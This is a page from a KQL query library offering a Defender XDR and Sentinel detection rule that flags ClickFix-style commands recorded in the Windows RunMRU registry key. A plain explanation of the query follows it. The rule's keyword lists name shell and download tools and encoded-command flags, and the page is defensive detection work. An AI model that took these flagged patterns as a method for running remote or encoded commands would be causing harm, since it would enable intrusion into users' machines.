KQL Search

Query Details

HomeAI ToolsDevice Query

Suspicious RUNMRU Entry

Query

# Suspicious RUNMRU Entry

## Query Information

#### Description
This query should be implemented as custom detection, it triggers once a Suspicious Windows RUNMRU entry found on a device. These RUNMRU entries are one of the key indicators for ClickFix.

The list of *Parameters* and *Executables* is limited, add additional entries according to your risk apetite.

#### Risk
There is high likelyhood that the command found is deploying malicious content on the device.

#### References
- https://detect.fyi/hunting-clickfix-initial-access-techniques-8c1b38d5ef9b
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-march-2025/

## Defender XDR
```KQL
let Parameters = dynamic(['http', 'https', 'Encoded', 'EncodedCommand', '-e', '-eC', '-enc', "-w"]);
let Executables = dynamic(["cmd", "powershell", "curl", "mshta"]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey has "RunMRU"
| where RegistryValueData has_any (Parameters) and RegistryValueData has_any (Executables)
| project-reorder Timestamp, DeviceId, DeviceName, RegistryValueData, RegistryKey
```

## Sentinel
```KQL
let Parameters = dynamic(['http', 'https', 'Encoded', 'EncodedCommand', '-e', '-eC', '-enc', "-w"]);
let Executables = dynamic(["cmd", "powershell", "curl", "mshta"]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey has "RunMRU"
| where RegistryValueData has_any (Parameters) and RegistryValueData has_any (Executables)
| project-reorder TimeGenerated, DeviceId, DeviceName, RegistryValueData, RegistryKey
```

Explanation

This query is designed to detect potentially suspicious activity on a Windows device by examining the Windows registry for specific entries. It focuses on identifying entries in the "RunMRU" registry key, which records the commands that have been executed using the Run dialog box in Windows. The query looks for entries that contain certain parameters and executable names that are often associated with malicious activity.

Here's a simple breakdown of what the query does:

  1. Parameters and Executables: It defines two lists:

    • Parameters: Includes terms like 'http', 'https', 'Encoded', 'EncodedCommand', and various encoded command flags.
    • Executables: Includes common command-line tools like "cmd", "powershell", "curl", and "mshta".

  2. Registry Events: It filters events where a registry value has been set, specifically looking at the "RunMRU" key.

  3. Suspicious Entries: It checks if the registry value data contains any of the specified parameters and executables, which could indicate the execution of potentially harmful commands.

  4. Output: The query then organizes the results to show the timestamp, device ID, device name, the data of the registry value, and the registry key itself.

This query is intended to be used as a custom detection rule to alert security teams when potentially malicious commands are executed on a device, helping to identify and mitigate threats early.

Details

Bert-Jan Pals profile picture

Bert-Jan Pals

Released: April 23, 2025

Tables

DeviceRegistryEvents

Keywords

Device

Operators

letdynamichashas_anywhereproject-reorder

Actions